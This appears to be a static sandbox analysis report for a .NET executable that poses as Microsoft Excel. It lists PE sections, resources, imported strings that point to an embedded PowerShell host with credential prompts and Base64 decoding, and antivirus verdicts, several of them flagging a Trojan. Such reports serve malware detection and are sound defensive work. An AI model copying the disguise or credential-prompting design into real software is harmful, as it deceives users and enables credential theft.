Static | ZeroBOX

PE Compile Time

2021-09-30 21:11:59

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00016cf4 0x00016e00 4.75299627614
.rsrc 0x0001a000 0x0001a598 0x0001a600 3.96218937945
.reloc 0x00036000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00034348 0x0000005a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0001a220 0x00000324 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000343a8 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Strings

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
**x2s
**xTs
$XK
$XK
$XK
Z+X(\
Z+X(\
v4.0.30319
#Strings
<Module>
EXCEL.exe
Credential_Form
ModuleNameSpace
CREDUI_INFO
CREDUI_FLAGS
CredUI_ReturnCodes
User_Pwd
MainModuleRawUI
Input_Box
Choice_Box
ReadKey_Box
Keyboard_Form
Progress_Form
Progress_Data
Console_Info
FileType
STDHandle
MainModuleUI
MainModule
ConsoleColorProxy
MainAppInterface
MainApp
mscorlib
System
Object
ValueType
System.Management.Automation
System.Management.Automation.Host
PSHostRawUserInterface
System.Windows.Forms
PSHostUserInterface
PSHost
System.Text
StringBuilder
CredUIPromptForCredentials
PSCredentialTypes
PSCredentialUIOptions
PromptForPassword
cbSize
hwndParent
pszMessageText
pszCaptionText
hbmBanner
value__
INCORRECT_PASSWORD
DO_NOT_PERSIST
REQUEST_ADMINISTRATOR
EXCLUDE_CERTIFICATES
REQUIRE_CERTIFICATE
SHOW_SAVE_CHECK_BOX
ALWAYS_SHOW_UI
REQUIRE_SMARTCARD
PASSWORD_ONLY_OK
VALIDATE_USERNAME
COMPLETE_USERNAME
PERSIST
SERVER_CREDENTIAL
EXPECT_CONFIRMATION
GENERIC_CREDENTIALS
USERNAME_TARGET_CREDENTIALS
KEEP_USERNAME
NO_ERROR
ERROR_CANCELLED
ERROR_NO_SUCH_LOGON_SESSION
ERROR_NOT_FOUND
ERROR_INVALID_ACCOUNT_NAME
ERROR_INSUFFICIENT_BUFFER
ERROR_INVALID_PARAMETER
ERROR_INVALID_FLAGS
Password
Domain
ConsoleColor
GUIBackgroundColor
GUIForegroundColor
get_BackgroundColor
set_BackgroundColor
get_BufferSize
set_BufferSize
Coordinates
get_CursorPosition
set_CursorPosition
get_CursorSize
set_CursorSize
Invisible_Form
FlushInputBuffer
get_ForegroundColor
set_ForegroundColor
BufferCell
Rectangle
GetBufferContents
get_KeyAvailable
get_MaxPhysicalWindowSize
get_MaxWindowSize
KeyInfo
ReadKeyOptions
ReadKey
ScrollBufferContents
SetBufferContents
get_WindowPosition
set_WindowPosition
get_WindowSize
set_WindowSize
get_WindowTitle
set_WindowTitle
BackgroundColor
BufferSize
CursorPosition
CursorSize
ForegroundColor
KeyAvailable
MaxPhysicalWindowSize
MaxWindowSize
WindowPosition
WindowSize
WindowTitle
MB_GetString
DialogResult
System.Collections.ObjectModel
Collection`1
ChoiceDescription
ToUnicode
GetCharFromKeys
checkKeyDown
keyinfo
KeyEventArgs
Keyboard_Form_KeyDown
Keyboard_Form_KeyUp
ProgressBarColor
System.Timers
barNumber
barValue
inTick
System.Collections.Generic
List`1
progressDataList
System.Drawing
DrawingColor
InitializeComponent
ElapsedEventArgs
TimeTick
AddBar
GetCount
ProgressRecord
Update
lbActivity
lbStatus
ProgressBar
objProgressBar
lbRemainingTime
lbOperation
ActivityId
ParentActivityId
GetStdHandle
GetFileType
IsInputRedirected
IsOutputRedirected
IsErrorRedirected
FILE_TYPE_UNKNOWN
FILE_TYPE_DISK
FILE_TYPE_CHAR
FILE_TYPE_PIPE
FILE_TYPE_REMOTE
STD_INPUT_HANDLE
STD_OUTPUT_HANDLE
STD_ERROR_HANDLE
ErrorForegroundColor
ErrorBackgroundColor
WarningForegroundColor
WarningBackgroundColor
DebugForegroundColor
DebugBackgroundColor
VerboseForegroundColor
VerboseBackgroundColor
ProgressForegroundColor
ProgressBackgroundColor
Dictionary`2
PSObject
FieldDescription
Prompt
PromptForChoice
PSCredential
PromptForCredential
get_RawUI
ib_caption
ib_message
ReadLine
System.Security
SecureString
getPassword
ReadLineAsSecureString
WriteDebugLine
WriteErrorLine
WriteLine
WriteProgress
WriteVerboseLine
WriteWarningLine
parent
System.Globalization
CultureInfo
originalCultureInfo
originalUICultureInfo
get_PrivateData
_consoleColorProxy
get_CurrentCulture
get_CurrentUICulture
get_InstanceId
get_Name
get_UI
Version
get_Version
EnterNestedPrompt
ExitNestedPrompt
NotifyBeginApplication
NotifyEndApplication
SetShouldExit
PrivateData
CurrentCulture
CurrentUICulture
InstanceId
get_ErrorForegroundColor
set_ErrorForegroundColor
get_ErrorBackgroundColor
set_ErrorBackgroundColor
get_WarningForegroundColor
set_WarningForegroundColor
get_WarningBackgroundColor
set_WarningBackgroundColor
get_DebugForegroundColor
set_DebugForegroundColor
get_DebugBackgroundColor
set_DebugBackgroundColor
get_VerboseForegroundColor
set_VerboseForegroundColor
get_VerboseBackgroundColor
set_VerboseBackgroundColor
get_ProgressForegroundColor
set_ProgressForegroundColor
get_ProgressBackgroundColor
set_ProgressBackgroundColor
get_ShouldExit
set_ShouldExit
get_ExitCode
set_ExitCode
ShouldExit
ExitCode
shouldExit
exitCode
UnhandledExceptionEventArgs
CurrentDomain_UnhandledException
credinfo
targetName
reserved1
iError
userName
maxUserName
password
maxPassword
pfSave
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
caption
message
target
credTypes
options
rectangle
source
destination
origin
contents
strTitle
strPrompt
strVal
blSecure
arrChoice
intDefault
wVirtKey
wScanCode
lpKeyState
pwszBuff
OutAttribute
cchBuff
wFlags
blShift
blAltGr
blIncludeKeyDown
sender
position
BarColor
objRecord
stdHandle
descriptions
choices
defaultChoice
allowedCredentialTypes
foregroundColor
backgroundColor
sourceId
record
System.Reflection
AssemblyTitleAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyVersionAttribute
AssemblyFileVersionAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DllImportAttribute
credui
String
IsNullOrEmpty
Marshal
SizeOf
IntPtr
ToString
StructLayoutAttribute
LayoutKind
FlagsAttribute
set_Opacity
set_ShowInTaskbar
Control
set_Visible
get_Bottom
get_Top
get_Right
get_Left
Address
BufferCellType
set_Height
set_Width
AppDomain
get_CurrentDomain
get_FriendlyName
user32.dll
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
TextBox
Button
set_Text
set_Location
Screen
FromControl
get_Bounds
get_Width
set_MaximumSize
set_AutoSize
ControlCollection
get_Controls
set_UseSystemPasswordChar
SetBounds
PtrToStringUni
set_DialogResult
set_ClientSize
AddRange
FormBorderStyle
set_FormBorderStyle
FormStartPosition
set_StartPosition
Assembly
GetExecutingAssembly
get_Location
ExtractAssociatedIcon
set_Icon
set_MinimizeBox
set_MaximizeBox
IButtonControl
set_AcceptButton
set_CancelButton
ShowDialog
get_Text
get_Count
RadioButton
ToolTip
IEnumerator`1
GetEnumerator
get_Current
get_Label
set_Checked
get_Height
get_HelpMessage
SetToolTip
System.Collections
IEnumerator
MoveNext
IDisposable
Dispose
set_ShowAlways
get_Checked
KeyEventHandler
add_KeyDown
add_KeyUp
get_KeyValue
set_VirtualKeyCode
get_KeyCode
get_Shift
get_Alt
get_Control
get_Chars
set_Character
set_KeyDown
ControlKeyStates
set_ControlKeyState
get_ControlKeyState
get_Modifiers
get_Black
get_Blue
get_Cyan
ColorTranslator
FromHtml
get_Magenta
get_Red
get_White
get_Yellow
SuspendLayout
ScrollableControl
set_AutoScroll
set_BackColor
set_ControlBox
ResumeLayout
ElapsedEventHandler
add_Elapsed
set_Interval
set_AutoReset
get_Item
set_Value
Refresh
set_Left
set_Top
get_Font
FontStyle
set_Font
ProgressBarStyle
set_Style
set_ForeColor
set_Size
get_ActivityId
ProgressRecordType
get_RecordType
Remove
System.ComponentModel
Component
RemoveAt
get_ParentActivityId
Insert
get_Activity
get_StatusDescription
get_PercentComplete
get_SecondsRemaining
TimeSpan
get_TotalHours
get_Minutes
get_Seconds
Format
Concat
get_CurrentOperation
Application
DoEvents
Kernel32.dll
MessageBox
get_ParameterAssemblyFullName
RuntimeTypeHandle
GetTypeFromHandle
GetType
get_IsArray
GetElementType
MakeGenericType
EmptyTypes
ConstructorInfo
BindingFlags
Binder
ParameterModifier
GetConstructor
Invoke
Convert
ChangeType
InvokeMember
op_Inequality
op_Equality
get_DefaultValue
Exception
ToCharArray
AppendChar
Console
ConsoleKeyInfo
ConsoleKey
get_Key
get_Length
get_KeyChar
MessageBoxButtons
MessageBoxIcon
System.Threading
Thread
get_CurrentThread
NewGuid
AsPSObject
ArgumentNullException
STAThreadAttribute
<>c__DisplayClass5
ManualResetEvent
DataAddedEventArgs
<Main>b__0
IAsyncResult
<Main>b__2
<>c__DisplayClass7
CS$<>8__locals6
PSDataCollection`1
colOutput
<Main>b__1
ErrorRecord
get_Index
get_IsCompleted
EventWaitHandle
EnableVisualStyles
UnhandledExceptionEventHandler
add_UnhandledException
System.Management.Automation.Runspaces
RunspaceFactory
Runspace
CreateRunspace
ApartmentState
set_ApartmentState
PowerShell
Create
set_Runspace
PSDataStreams
get_Streams
get_Error
EventHandler`1
add_DataAdded
Complete
Replace
Compare
StringComparison
StartsWith
StringSplitOptions
System.Diagnostics
Debugger
Launch
Encoding
get_UTF8
FromBase64String
GetString
System.IO
WriteAllText
AddScript
System.Text.RegularExpressions
get_Success
GroupCollection
get_Groups
Double
TryParse
AddParameter
Capture
get_Value
ToUpper
Boolean
AddArgument
AddCommand
AsyncCallback
PSInvocationSettings
BeginInvoke
WaitHandle
WaitOne
PSInvocationStateInfo
get_InvocationStateInfo
PSInvocationState
get_State
get_Reason
get_Message
CompilerGeneratedAttribute
Microsoft Excel
Microsoft Office
16.0.12827.20336
Microsoft Corporation
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
I6& $
+>#{_H?
Td&d"6"
Fay!Jj
5w"'q<
Fay!Jj
>-m-x`
lb&=SbRP
\U((/@
]Bi^1/
o^RnjO
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}."2}.
2}."2}.
2}."2}.
2}."2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.02}.`2}.
2}.@2}.p2}.
2}.!2}.P2}.
2}.02}.`2}.
2}.@2}.p2}.
2}. 2}.P2}.
2}.K2}.
2}.K2}.
2}. 2}.O2}.
2}.?2}.o2}.
2}./2}._2}.
2}. 2}.O2}.
2}.?2}.o2}.
2}./2}._2}.
2}.'2}.V2}.v2}.&
2}.62}.f2}.
2}.F2}.v2}.
2}.'2}.V2}.
2}.62}.f2}.
2}.52}.f2}.
2}.'2}.U2}.
2}.E2}.u2}.
2}.62}.e2}.
2}.'2}.V2}.w2}.'
2}.,2}.\2}.
2}.<2}.l2}.
2}.L2}.|2}.
2}.L2}.{2}.
2}.<2}.k2}.
2}.,2}.[2}.
2}."2}.R2}.l
2}.22}.b2}.
2}.22}.b2}.
2}."2}.R2}.l
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Secure input:
Input:
Cancel
Press a key
#000080
#808080
#008000
#008080
#800080
#800000
#808000
#C0C0C0
#00FF00
Remaining time:
{0:00}:{1:00}:{2:00}
System.Collections.Generic.List
{0}[{1}]:
ToArray
(Type !? for help.)
Wrong format, please repeat input:
PSRunspace-Host
-whatt
-extdummt
If you spzzcify thzz -zzxtract option you nzzed to add a filzz for zzxtraction in this way
-zzxtract:"<filzznamzz>"
-debug
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
^-([^: ]+)[ :]?([^:]*)$
$FALSE
out-string
stream
Click OK to exit...
Unhandled exception in
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
CompanyName
Microsoft Corporation
FileDescription
Microsoft Excel
FileVersion
16.0.12827.20336
InternalName
EXCEL.exe
LegalCopyright
OriginalFilename
EXCEL.exe
ProductName
Microsoft Office
ProductVersion
16.0.12827.20336
Assembly Version
16.0.12827.20336
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic Clean
MicroWorld-eScan Clean
CMC Clean
CAT-QuickHeal Trojan.WacatacFC.S15903510
McAfee Artemis!6422332249A3
Malwarebytes Clean
Sangfor Clean
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
CrowdStrike Clean
Baidu Clean
Cyren W32/MSIL_Kryptik.BWA.gen!Eldorado
Symantec Clean
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.ct
FireEye Generic.mg.6422332249a3e867
Sophos Clean
SentinelOne Static AI - Malicious PE
GData Clean
Jiangmin Clean
Webroot Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Trojan/Win32.Kryptik.C4247069
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34170.mm0@aKhp31h
ALYac Clean
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Clean
eGambit Unsafe.AI_Score_96%
Fortinet Clean
Avast Clean
MaxSecure Clean
No IRMA results available.